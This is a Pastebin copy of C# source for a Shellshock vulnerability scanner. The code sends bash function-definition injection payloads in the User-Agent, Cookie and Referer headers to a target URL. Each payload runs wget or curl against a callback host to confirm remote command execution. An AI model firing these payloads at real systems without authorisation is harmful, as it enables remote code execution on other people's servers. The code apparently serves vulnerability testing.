BrandonPotter

ShellShock.brandonpotter.com

Sep 25th, 2014
8,121
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. using System;
  2. using System.Collections.Generic;
  3. using System.Linq;
  4. using System.Net;
  5. using System.Text;
  6. using System.Threading.Tasks;
  7.  
  8. namespace ShellShockExploiter
  9. {
  10.     public class SSExploiter
  11.     {
  12.         public event Action<string> TestExecuted;
  13.  
  14.         public void RunHttpExploitReport(string targetUrl, string testId, string urlNotes)
  15.         {
  16.             string[] headers = new string[] { "User-Agent", "Cookie", "Referer" };
  17.  
  18.             foreach (var header in headers)
  19.             {
  20.                 // original exploit
  21.                 RunSingleTest(targetUrl, "() { :;}; wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-wget", header, urlNotes, "() { :;}; wget");
  22.                 RunSingleTest(targetUrl, "() { :;}; curl http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-curl", header, urlNotes, "() { :;}; curl");
  23.                 RunSingleTest(targetUrl, "() { :;}; /usr/local/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-usr-local-bin-wget", header, urlNotes, "() { :;}; /usr/local/bin/wget");
  24.                 RunSingleTest(targetUrl, "() { :;}; /usr/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-usr-bin-wget", header, urlNotes, "() { :;}; /usr/bin/wget");
  25.  
  26.                 // new exploit for patch
  27.                 // () { (a)=>\' bash -c "echo date"
  28.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c 'wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-wget'", header, urlNotes, "() { (a)=>\' bash -c 'wget");
  29.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c 'curl http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-curl'", header, urlNotes, "() { (a)=>\' bash -c 'curl");
  30.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c '/usr/local/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-usr-local-bin-wget'", header, urlNotes, "() { (a)=>\' bash -c '/usr/local/bin/wget");
  31.                 RunSingleTest(targetUrl, "() { (a)=>\' bash -c '/usr/bin/wget http://shellshock.brandonpotter.com/report/" + testId + "/" + header + "-bash-c-usr-bin-wget'", header, urlNotes, "() { (a)=>\' bash -c '/usr/bin/wget");
  32.             }
  33.         }
  34.  
  35.         private void RunSingleTest(string targetUrl, string bashCmd, string header, string urlNotes, string exploitType)
  36.         {            
  37.             ShortWebClient wC = new ShortWebClient();
  38.             string serverResponse = "";
  39.             try
  40.             {
  41.                 wC.Headers.Add(header, bashCmd);
  42.                 wC.DownloadString(targetUrl);
  43.                 serverResponse = "200 OK";
  44.             }
  45.             catch (TimeoutException te)
  46.             {
  47.                 serverResponse = "Timeout";
  48.             }
  49.             catch (WebException e)
  50.             {
  51.                 if (e.Message.Contains("(403) Forbidden"))
  52.                 {
  53.                     serverResponse = "403 Forbidden";
  54.                 }
  55.                 else if (e.Message.Contains("(404) Not Found"))
  56.                 {
  57.                     serverResponse = "404 Not Found";
  58.                 }
  59.                 else
  60.                 {
  61.                     serverResponse = "Error";
  62.                 }
  63.             }
  64.             catch (Exception e) {
  65.                 serverResponse = "No Response or Error";
  66.             }
  67.  
  68.             wC.Dispose();
  69.             wC = null;
  70.  
  71.             try
  72.             {
  73.                 this.TestExecuted("URL " + targetUrl + " (" + urlNotes + ") (Header " + header + " exploit attempted with " + exploitType + ")... " + serverResponse);
  74.             }
  75.             catch { }
  76.         }
  77.     }
  78. }
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×